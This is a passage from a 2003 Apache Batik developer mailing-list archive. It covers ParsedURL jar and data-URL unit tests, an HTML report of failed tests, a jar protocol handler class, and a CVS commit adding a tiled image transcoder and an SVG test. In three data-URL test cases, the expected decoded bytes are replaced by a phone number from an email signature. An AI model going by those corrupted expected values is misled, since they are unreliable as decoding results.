class="java.lang.String" value="//jakarta.apache.org/ant/" /> <arg class="java.lang.String" value="http://jakarta.apache.org/ant/" /> </test> <test id="ParsedURL.10" class="org.apache.batik.util.ParsedURLTest"> <!-- Test references to same document --> <arg class="java.lang.String" value="http://xml.apache.org/batik/#test" /> <arg class="java.lang.String" value="" /> <arg class="java.lang.String" value="http://xml.apache.org/batik/#test" /> </test> <test id="ParsedURL.11" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with absolute path to root --> <arg class="java.lang.String" value="http://xml.apache.org/batik/" /> <arg class="java.lang.String" value="/" /> <arg class="java.lang.String" value="http://xml.apache.org/" /> </test> <test id="ParsedURL.12" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with absolute path to item --> <arg class="java.lang.String" value="http://xml.apache.org/batik/" /> <arg class="java.lang.String" value="/fop/" /> <arg class="java.lang.String" value="http://xml.apache.org/fop/" /> </test> <test id="ParsedURL.13" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with absolute path to item --> <arg class="java.lang.String" value="file:helloWorld.svg" /> <arg class="java.lang.String" value="file:test.svg#Foo" /> <arg class="java.lang.String" value="file:test.svg#Foo" /> </test> <test id="ParsedURL.14" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative with absolute path to item --> <arg class="java.lang.String" value="file:" /> <arg class="java.lang.String" value="file:junk.svg#Bar" /> <arg class="java.lang.String" value="file:junk.svg#Bar" /> </test> <!-- Tests for the jar protocol... --> <test id="ParsedURL.15" class="org.apache.batik.util.ParsedURLTest"> <!-- Test basic parsing of jar URL --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> </test> <test id="ParsedURL.16" class="org.apache.batik.util.ParsedURLTest"> <!-- more basic parsing of jar URL --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg#foo" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg#foo" /> </test> <test id="ParsedURL.17" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative file from base jar URL --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="../base.svg" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/base.svg" /> </test> <test id="ParsedURL.18" class="org.apache.batik.util.ParsedURLTest"> <!-- Test fragment from base jar URL --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="#foo" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg#foo" /> </test> <test id="ParsedURL.19" class="org.apache.batik.util.ParsedURLTest"> <!-- Test fragment replacement in base jar URL --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg#bar" /> <arg class="java.lang.String" value="#faz" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg#faz" /> </test> <test id="ParsedURL.20" class="org.apache.batik.util.ParsedURLTest"> <!-- Test simple absolute child jar URL --> <arg class="java.lang.String" value="jar:file:/path1!/path2" /> <arg class="java.lang.String" value="jar:file:/path3!/path4" /> <arg class="java.lang.String" value="jar:file:/path3!/path4" /> </test> <test id="ParsedURL.21" class="org.apache.batik.util.ParsedURLTest"> <!-- Test complex absolute child jar URL --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar" /> </test> <test id="ParsedURL.22" class="org.apache.batik.util.ParsedURLTest"> <!-- Test absolute path, relative jar --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="/b/a/t/i/k/new.svg" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg" /> </test> <test id="ParsedURL.23" class="org.apache.batik.util.ParsedURLTest"> <!-- Test absolute path, relative jar --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="/b/a/t/i/k/new.svg#bar" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar" /> </test> <test id="ParsedURL.24" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative path, relative jar --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="t/o/new.svg" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/t/o/new.svg" /> </test> <test id="ParsedURL.25" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative path, relative jar --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="t/o/new.svg#foo" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/t/o/new.svg#foo" /> </test> <test id="ParsedURL.26" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative path, relative jar --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="../c/h/new.svg" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/c/h/new.svg" /> </test> <test id="ParsedURL.27" class="org.apache.batik.util.ParsedURLTest"> <!-- Test relative path, relative jar --> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="../c/h/new.svg#foo" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/p/a/t/c/h/new.svg#foo" /> </test> <test id="ParsedURLData.1" class="org.apache.batik.util.ParsedURLDataTest"> <!-- Test basic image base 64 data --> <arg class="java.lang.String" value="data:image/png;base64,R0lGODdhMAAw" /> <arg class="java.lang.String" value="CT: image/png CE: base64 DATA: +1-623-992-4185 URL: data:image/png;base64,R0lGODdhMAAw" /> </test> <test id="ParsedURLData.2" class="org.apache.batik.util.ParsedURLDataTest"> <!-- Test text encoded as base 64 data --> <arg class="java.lang.String" value="data:text/plain;charset=US-ASCII;base64,R0lGODdhMAAw" /> <arg class="java.lang.String" value="CT: text/plain;charset=US-ASCII CE: base64 DATA: +1-623-992-4185 URL: data:text/plain;charset=US-ASCII;base64,R0lGODdhMAAw" /> </test> <test id="ParsedURLData.3" class="org.apache.batik.util.ParsedURLDataTest"> <!-- Test basic image base 64 data --> <arg class="java.lang.String" value="data:image/gif;base64,R0lGODdhMAAw" /> <arg class="java.lang.String" value="CT: image/gif CE: base64 DATA: +1-623-992-4185 URL: data:image/gif;base64,R0lGODdhMAAw" /> </test> <test id="ParsedURLData.4" class="org.apache.batik.util.ParsedURLDataTest"> <!-- Test text using octect encoding. --> <arg class="java.lang.String" value="data:text/plain;charset=iso-8859-7,%be%fb%be" /> <arg class="java.lang.String" value="CT: text/plain;charset=iso-8859-7 CE: null DATA: be fb be URL: data:text/plain;charset=iso-8859-7,%be%fb%be" /> </test> <test id="ParsedURLData.5" class="org.apache.batik.util.ParsedURLDataTest"> <!-- Test Minimalest data url --> <arg class="java.lang.String" value="data:,A%20brief%20note" /> <arg class="java.lang.String" value="CT: null CE: null DATA: 2c 41 20 62 72 URL: data:,,A%20brief%20note" /> </test> <test id="ParsedURLData.6" class="org.apache.batik.util.ParsedURLDataTest"> <!-- Test tricky data url --> <arg class="java.lang.String" value="data:;=;,A%20brief%20note" /> <arg class="java.lang.String" value="CT: ;= CE: DATA: 41 20 62 72 69 URL: data:;=;,A%20brief%20note" /> </test> </testSuite> --------------000503000803020103020507 Content-Type: text/html; charset=UTF-8; name="regardReport.html" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="regardReport.html" <html xmlns:xlink="http://www.w3.org/2000/xlink/namespace/"> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link href="../../style/style.css" media="screen" type="text/css" rel="stylesheet"> </head> <body style="background-image: url(../../images/background.png);"> <table bgcolor="white" vspace="0" hspace="0" cellspacing="0" cellpadding="0" border="0" width="600" class="reportDate"> <tr> <td class="reportDate">2003.02.03-17h46m08s</td> </tr> </table> <h1>Regard Test Report -- 29/34</h1> <hr align="left" width="600" size="1" noshade="noshade"> <h2>Failed Leaf Tests</h2> <ol> <li> <a href="#regard.util.unitTesting.ParsedURL.17">jar:file:dir/file.jar!/p/a/t/base.svg -- ParsedURL.17</a> </li> <li> <a href="#regard.util.unitTesting.ParsedURL.22">jar:file:dir/file.jar!/b/a/t/i/k/new.svg -- ParsedURL.22</a> </li> <li> <a href="#regard.util.unitTesting.ParsedURL.23">jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar -- ParsedURL.23</a> </li> <li> <a href="#regard.util.unitTesting.ParsedURL.26">jar:file:dir/file.jar!/p/a/t/c/h/new.svg -- ParsedURL.26</a> </li> <li> <a href="#regard.util.unitTesting.ParsedURL.27">jar:file:dir/file.jar!/p/a/t/c/h/new.svg#foo -- ParsedURL.27</a> </li> </ol> <hr align="left" width="600" size="1" noshade="noshade"> &nbsp;<br> <h2>Report Details</h2> <a name="regard.util.unitTesting.ParsedURL.17"></a> <table width="600" border="0" cellpadding="0" cellspacing="0" hspace="0" vspace="0" bgcolor="black"> <tr> <td> <table width="600" border="0" cellpadding="2" cellspacing="1" hspace="0" vspace="0" bgcolor="black"> <tr bgcolor="#eeeeee"> <td colspan="2"><img height="16" width="16" src="../../images/deco.png" align="bottom">&nbsp; <font class="titlefailed">&nbsp;jar:file:dir/file.jar!/p/a/t/base.svg -- ParsedURL.17</font> &nbsp;(ParsedURLTest.error.wrong.result) </td> </tr> <tr bgcolor="white"> <td>Error Description.</td><td>Expected Result : jar:file:dir/file.jar!/p/a/t/base.svg Got Result : jar:file:dir/file.jar!/p/a/t/h/../base.svg</td> </tr> </table> </td> </tr> </table> <br> <a name="regard.util.unitTesting.ParsedURL.22"></a> <table width="600" border="0" cellpadding="0" cellspacing="0" hspace="0" vspace="0" bgcolor="black"> <tr> <td> <table width="600" border="0" cellpadding="2" cellspacing="1" hspace="0" vspace="0" bgcolor="black"> <tr bgcolor="#eeeeee"> <td colspan="2"><img height="16" width="16" src="../../images/deco.png" align="bottom">&nbsp; <font class="titlefailed">&nbsp;jar:file:dir/file.jar!/b/a/t/i/k/new.svg -- ParsedURL.22</font> &nbsp;(ParsedURLTest.error.wrong.result) </td> </tr> <tr bgcolor="white"> <td>Error Description.</td><td>Expected Result : jar:file:dir/file.jar!/b/a/t/i/k/new.svg Got Result : jar:/b/a/t/i/k/new.svg</td> </tr> </table> </td> </tr> </table> <br> <a name="regard.util.unitTesting.ParsedURL.23"></a> <table width="600" border="0" cellpadding="0" cellspacing="0" hspace="0" vspace="0" bgcolor="black"> <tr> <td> <table width="600" border="0" cellpadding="2" cellspacing="1" hspace="0" vspace="0" bgcolor="black"> <tr bgcolor="#eeeeee"> <td colspan="2"><img height="16" width="16" src="../../images/deco.png" align="bottom">&nbsp; <font class="titlefailed">&nbsp;jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar -- ParsedURL.23</font> &nbsp;(ParsedURLTest.error.wrong.result) </td> </tr> <tr bgcolor="white"> <td>Error Description.</td><td>Expected Result : jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar Got Result : jar:/b/a/t/i/k/new.svg#bar</td> </tr> </table> </td> </tr> </table> <br> <a name="regard.util.unitTesting.ParsedURL.26"></a> <table width="600" border="0" cellpadding="0" cellspacing="0" hspace="0" vspace="0" bgcolor="black"> <tr> <td> <table width="600" border="0" cellpadding="2" cellspacing="1" hspace="0" vspace="0" bgcolor="black"> <tr bgcolor="#eeeeee"> <td colspan="2"><img height="16" width="16" src="../../images/deco.png" align="bottom">&nbsp; <font class="titlefailed">&nbsp;jar:file:dir/file.jar!/p/a/t/c/h/new.svg -- ParsedURL.26</font> &nbsp;(ParsedURLTest.error.wrong.result) </td> </tr> <tr bgcolor="white"> <td>Error Description.</td><td>Expected Result : jar:file:dir/file.jar!/p/a/t/c/h/new.svg Got Result : jar:file:dir/file.jar!/p/a/t/h/../c/h/new.svg</td> </tr> </table> </td> </tr> </table> <br> <a name="regard.util.unitTesting.ParsedURL.27"></a> <table width="600" border="0" cellpadding="0" cellspacing="0" hspace="0" vspace="0" bgcolor="black"> <tr> <td> <table width="600" border="0" cellpadding="2" cellspacing="1" hspace="0" vspace="0" bgcolor="black"> <tr bgcolor="#eeeeee"> <td colspan="2"><img height="16" width="16" src="../../images/deco.png" align="bottom">&nbsp; <font class="titlefailed">&nbsp;jar:file:dir/file.jar!/p/a/t/c/h/new.svg#foo -- ParsedURL.27</font> &nbsp;(ParsedURLTest.error.wrong.result) </td> </tr> <tr bgcolor="white"> <td>Error Description.</td><td>Expected Result : jar:file:dir/file.jar!/p/a/t/c/h/new.svg#foo Got Result : jar:file:dir/file.jar!/p/a/t/h/../c/h/new.svg#foo</td> </tr> </table> </td> </tr> </table> <br> </body> </html> --------------000503000803020103020507 Content-Type: text/html; name="ParsedURLJarProtocolHandler.java" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="ParsedURLJarProtocolHandler.java" /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.util; import java.io.ByteArrayInputStream; import java.io.InputStream; import java.io.IOException; import java.util.Iterator; /** * Protocol Handler for the 'jar' protocol. * This appears to have the format: * jar:<URL for jar file>!<path in jar file> * * @author <a href="mailto:[email protected]">Thomas DeWeese</a> * @version $Id: ParsedURLJarProtocolHandler.java,v 1.3 2002/05/20 17:18:57 deweese Exp $ */ public class ParsedURLJarProtocolHandler extends ParsedURLDefaultProtocolHandler { public static final String JAR = "jar"; public ParsedURLJarProtocolHandler() { super(JAR); } // We mostly use the base class parse methods (that leverage // java.net.URL. But we take care to ignore the baseURL if urlStr // is an absolute URL. public ParsedURLData parseURL(ParsedURL baseURL, String urlStr) { String start = urlStr.substring(0, JAR.length()+1).toLowerCase(); ParsedURLData pd = null; // urlStr is absolute... if (start.equals(JAR+":")) pd = parseURL(urlStr); else { // It's relative so base it off baseURL try { java.net.URL context = new java.net.URL(baseURL.toString()); java.net.URL url = new java.net.URL(context, urlStr); pd = constructParsedURLData(url); } catch (Exception e) { pd = super.parseURL(baseURL, urlStr); } } return(pd); } } --------------000503000803020103020507 Content-Type: text/plain; charset=us-ascii --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------000503000803020103020507-- From [email protected] Wed Feb 05 14:06:26 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14201 invoked by uid 500); 5 Feb 2003 14:06:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14190 invoked from network); 5 Feb 2003 14:06:25 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Wed, 5 Feb 2003 09:06:24 -0500 To: [email protected] Subject: Re: [Fwd: RE: Problem with Batik source code] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "KR" == Keven Ring <[email protected]> writes: KR> Attached are the ParsedURL tests which I added, along with the KR> html results from the original code. Also, I have attached the KR> changes to the code which you have suggested. KR> If there is anything else, please let me know! No, this looks good. It be committed shortly[1] Thanks, --- [1] Shortly is a relative term, that in this case may mean up to a week or more, due to temporary CVS issues :/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 05 14:39:04 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86544 invoked by uid 500); 5 Feb 2003 14:39:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86533 invoked from network); 5 Feb 2003 14:39:04 -0000 Message-ID: <[email protected]> Date: Wed, 05 Feb 2003 09:38:47 -0500 From: Keven Ring <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc3) Gecko/20020523 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: [Fwd: RE: Problem with Batik source code] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: multipart/alternative; boundary="------------000309070704090109090803" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --------------000309070704090109090803 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thomas E Deweese wrote: >>>>>>"KR" == Keven Ring <[email protected]> writes: >>>>>> >>>>>> > >KR> Attached are the ParsedURL tests which I added, along with the >KR> html results from the original code. Also, I have attached the >KR> changes to the code which you have suggested. > >KR> If there is anything else, please let me know! > > No, this looks good. It be committed shortly[1] > > Thanks, > > For the $64000 question, which official release will this likely be in? B5? When is that release scheduled? Thanks! >--- > >[1] Shortly is a relative term, that in this case may mean up to a week > or more, due to temporary CVS issues :/ > >--------------------------------------------------------------------- >To unsubscribe, e-mail: [email protected] >For additional commands, e-mail: [email protected] > > > -- Keven Ring | They called it Paradise, Lead Software Systems Engineer | I don't know why The MITRE Corporation | Call someplace Paradise +1-623-992-4185 | and kiss it goodbye.. --------------000309070704090109090803 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"> <title></title> </head> <body> Thomas E Deweese wrote:<br> <blockquote type="cite" cite="[email protected]"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <blockquote type="cite"> <pre wrap="">"KR" == Keven Ring <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a> writes: </pre> </blockquote> </blockquote> </blockquote> </blockquote> </blockquote> <pre wrap=""><!----> KR&gt; Attached are the ParsedURL tests which I added, along with the KR&gt; html results from the original code. Also, I have attached the KR&gt; changes to the code which you have suggested. KR&gt; If there is anything else, please let me know! No, this looks good. It be committed shortly[1] Thanks, </pre> </blockquote> For the $64000 question, which official release will this likely be in? &nbsp;B5? &nbsp;When is that release scheduled?<br> <br> Thanks!<br> <blockquote type="cite" cite="[email protected]"> <pre wrap=""> --- [1] Shortly is a relative term, that in this case may mean up to a week or more, due to temporary CVS issues :/ --------------------------------------------------------------------- To unsubscribe, e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> For additional commands, e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> </pre> </blockquote> <br> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, Lead Software Systems Engineer | I don't know why The MITRE Corporation | Call someplace Paradise +1-623-992-4185 | and kiss it goodbye..</pre> <br> </body> </html> --------------000309070704090109090803-- From [email protected] Thu Feb 06 22:59:45 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36557 invoked by uid 500); 6 Feb 2003 22:59:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36543 invoked by uid 500); 6 Feb 2003 22:59:44 -0000 Delivered-To: [email protected] Date: 6 Feb 2003 22:59:43 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/contrib/tiledTranscoder - New directory X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/06 14:59:43 xml-batik/contrib/tiledTranscoder - New directory --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Feb 08 13:25:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69183 invoked by uid 500); 8 Feb 2003 13:25:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69170 invoked by uid 500); 8 Feb 2003 13:25:13 -0000 Delivered-To: [email protected] Date: 8 Feb 2003 13:25:13 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/test-sources/org/apache/batik/util TestMessages.java Base64Test.java ParsedURLDataTest.java ParsedURLTest.java Messages.java X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/08 05:25:12 Modified: resources/org/apache/batik/apps/svgbrowser/resources init.svg sources/org/apache/batik/bridge SVGTextElementBridge.java sources/org/apache/batik/css/engine/value/svg GlyphOrientationManager.java sources/org/apache/batik/ext/awt/image/codec/tiff TIFFEncodeParam.java sources/org/apache/batik/gvt/text GVTAttributedCharacterIterator.java GlyphLayout.java sources/org/apache/batik/util ParsedURLJarProtocolHandler.java test-resources/org/apache/batik/test samplesRendering.xml test-resources/org/apache/batik/util unitTesting.xml test-resources/org/apache/batik/util/resources TestMessages.properties test-sources/org/apache/batik/util Base64Test.java ParsedURLDataTest.java ParsedURLTest.java Added: contrib/tiledTranscoder TiledImageTranscoder.java samples/tests/spec/text textGlyphOrientationHorizontal.svg test-sources/org/apache/batik/util TestMessages.java Removed: test-sources/org/apache/batik/util Messages.java Log: 1) glyph-orientation-horizontal now works properly. glyph-orientation-v/h no longer require a unit as per the SVG specification. added tests for glyph-orientation-horizontal 2) ParsedURL now handles 'jar' protocol URL's better. Also includes tests (Thanks to Keven Ring). Fixed error message handling in bati.util tests. 3) TIFFEncodeParam now uses correct values for compression types (Thanks to Felicia Ionascu) 4) Added example TiledImageTranscoder to contrib/tiledTranscoder. Revision Changes Path 1.1 xml-batik/contrib/tiledTranscoder/TiledImageTranscoder.java Index: TiledImageTranscoder.java =================================================================== /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.apps.tiledTranscoder; import java.awt.image.renderable.*; import java.awt.image.*; import java.io.*; import org.apache.batik.transcoder.*; import org.apache.batik.transcoder.image.*; import org.apache.batik.ext.awt.image.*; import org.apache.batik.ext.awt.image.codec.*; import org.apache.batik.ext.awt.image.codec.tiff.*; import org.apache.batik.ext.awt.image.rendered.*; import org.apache.batik.ext.awt.image.renderable.*; import org.w3c.dom.Document; public class TiledImageTranscoder extends SVGAbstractTranscoder { /** * Constructs a new <tt>ImageTranscoder</tt>. */ protected TiledImageTranscoder() { } /** * Transcodes the specified Document as an image in the specified output. * * @param document the document to transcode * @param uri the uri of the document or null if any * @param output the ouput where to transcode * @exception TranscoderException if an error occured while transcoding */ protected void transcode(Document document, String uri, TranscoderOutput output) throws TranscoderException { // Sets up root, curTxf & curAoi super.transcode(document, uri, output); Filter f = this.root.getGraphicsNodeRable(true); RenderContext rc = new RenderContext(curTxf, null, null); RenderedImage img = f.createRendering(rc); // prepare the image to be painted int w = img.getWidth(); int h = img.getHeight(); try { int bands = img.getSampleModel().getNumBands(); int [] off = new int[bands]; for (int i=0; i<bands; i++) off[i] = i; SampleModel sm = new PixelInterleavedSampleModel (DataBuffer.TYPE_BYTE, w, (100000+w-1)/w, bands, w*bands, off); RenderedImage rimg = new FormatRed(GraphicsUtil.wrap(img), sm); TIFFImageEncoder enc = new TIFFImageEncoder (output.getOutputStream(), null); enc.encode(rimg); } catch (IOException ioe) { ioe.printStackTrace(); } } public static void main (String [] args) { try { FileOutputStream fos = new FileOutputStream(args[1]); TiledImageTranscoder tit = new TiledImageTranscoder(); tit.addTranscodingHint(KEY_WIDTH, new Float(10240)); tit.transcode(new TranscoderInput("file:" + args[0]), new TranscoderOutput(fos)); } catch (IOException ioe) { ioe.printStackTrace(); } catch (TranscoderException te) { te.printStackTrace(); } } } 1.6 +3 -3 xml-batik/resources/org/apache/batik/apps/svgbrowser/resources/init.svg Index: init.svg =================================================================== RCS file: /home/cvs/xml-batik/resources/org/apache/batik/apps/svgbrowser/resources/init.svg,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- init.svg 6 Dec 2001 09:04:51 -0000 1.5 +++ init.svg 8 Feb 2003 13:25:11 -0000 1.6 @@ -1,11 +1,11 @@ <?xml version="1.0" standalone="no"?> +<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" + "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> + <!-- =================================================================== --> <!-- A dummy document used to preload classes. --> <!-- =================================================================== --> - -<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" - "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100" viewBox="0 0 100 100"> 1.1 xml-batik/samples/tests/spec/text/textGlyphOrientationHorizontal.svg Index: textGlyphOrientationHorizontal.svg =================================================================== <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> <!-- ====================================================================== --> <!-- Copyright (C) The Apache Software Foundation. All rights reserved. --> <!-- --> <!-- This software is published under the terms of the Apache Software --> <!-- License version 1.1, a copy of which has been included with this --> <!-- distribution in the LICENSE file. --> <!-- ====================================================================== --> <!-- ====================================================================== --> <!-- Test the x,dx and y,dy attributes --> <!-- --> <!-- @author [email protected] --> <!-- @version $Id: textGlyphOrientationHorizontal.svg,v 1.1 2003/02/08 13:25:11 deweese Exp $ --> <!-- ====================================================================== --> <?xml-stylesheet type="text/css" href="../../resources/style/test.css" ?> <svg width="450" height="500" viewBox="0 0 450 500" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" > <title>Text Orientation Horizontal</title> <!-- ============================================================= --> <!-- Test content --> <!-- ============================================================= --> <defs> <path id="path" style="fill:none; stroke:blue;" d="M 20 40 C 40 20 60 0 80 20 C 100 40 120 60 140 40 C 160 20 180 20 180 20"/> <path id="lpath" style="fill:none; stroke:blue;" d="M 20 40 c 40 -20 80 -40 120 -20 c 40 20 80 40 120 20 c 40 -20 80 -20 80 -20"/> </defs> <text class="title" x="50%" y="30">Text Orientation Horizontal</text> <g id="testContent" style="font-family:Arial; font-size:24"> <line x1="50" x2="200" y1="80" y2="80" stroke="blue" stroke-width="2"/> <text x="50" y="80" glyph-orientation-horizontal="0">Batik is Good</text> <g transform="translate(220, 60)"> <use xlink:href="#path" fill="none" stroke="blue" stroke-width="2"/> <text glyph-orientation-horizontal="0"> <textPath xlink:href="#path">Batik <tspan fill="red" dy="-10">is</tspan><tspan dy="10"> Good</tspan></textPath> </text> </g> <line x1="50" x2="400" y1="130" y2="130" stroke="blue" stroke-width="2"/> <text x="50" y="130" glyph-orientation-horizontal="90" >Batik is Good</text> <g transform="translate(30, 150)"> <use xlink:href="#lpath" fill="none" stroke="blue" stroke-width="2"/> <text glyph-orientation-horizontal="90"> <textPath xlink:href="#lpath">Batik <tspan fill="red" dy="-10">is</tspan><tspan dy="10"> Good</tspan></textPath> </text> </g> <line x1="50" x2="200" y1="240" y2="240" stroke="blue" stroke-width="2"/> <text x="50" y="240" glyph-orientation-horizontal="180" >Batik is Good</text> <g transform="translate(220, 220)"> <use xlink:href="#path" fill="none" stroke="blue" stroke-width="2"/> <text glyph-orientation-horizontal="180"> <textPath xlink:href="#path">Batik <tspan fill="red" dy="-10">is</tspan><tspan dy="10"> Good</tspan></textPath> </text> </g> <line x1="50" x2="400" y1="320" y2="320" stroke="blue" stroke-width="2"/> <text x="50" y="320" glyph-orientation-horizontal="270" >Batik is Good</text> <g transform="translate(30, 340)"> <use xlink:href="#lpath" fill="none" stroke="blue" stroke-width="2"/> <text glyph-orientation-horizontal="270"> <textPath xlink:href="#lpath">Batik <tspan fill="red" dy="-10">is</tspan><tspan dy="10"> Good</tspan></textPath> </text> </g> </g> </svg> 1.72 +27 -1 xml-batik/sources/org/apache/batik/bridge/SVGTextElementBridge.java Index: SVGTextElementBridge.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/SVGTextElementBridge.java,v retrieving revision 1.71 retrieving revision 1.72 diff -u -r1.71 -r1.72 --- SVGTextElementBridge.java 12 Nov 2002 09:51:34 -0000 1.71 +++ SVGTextElementBridge.java 8 Feb 2003 13:25:11 -0000 1.72 @@ -544,6 +544,7 @@ case SVGCSSEngine.DIRECTION_INDEX: case 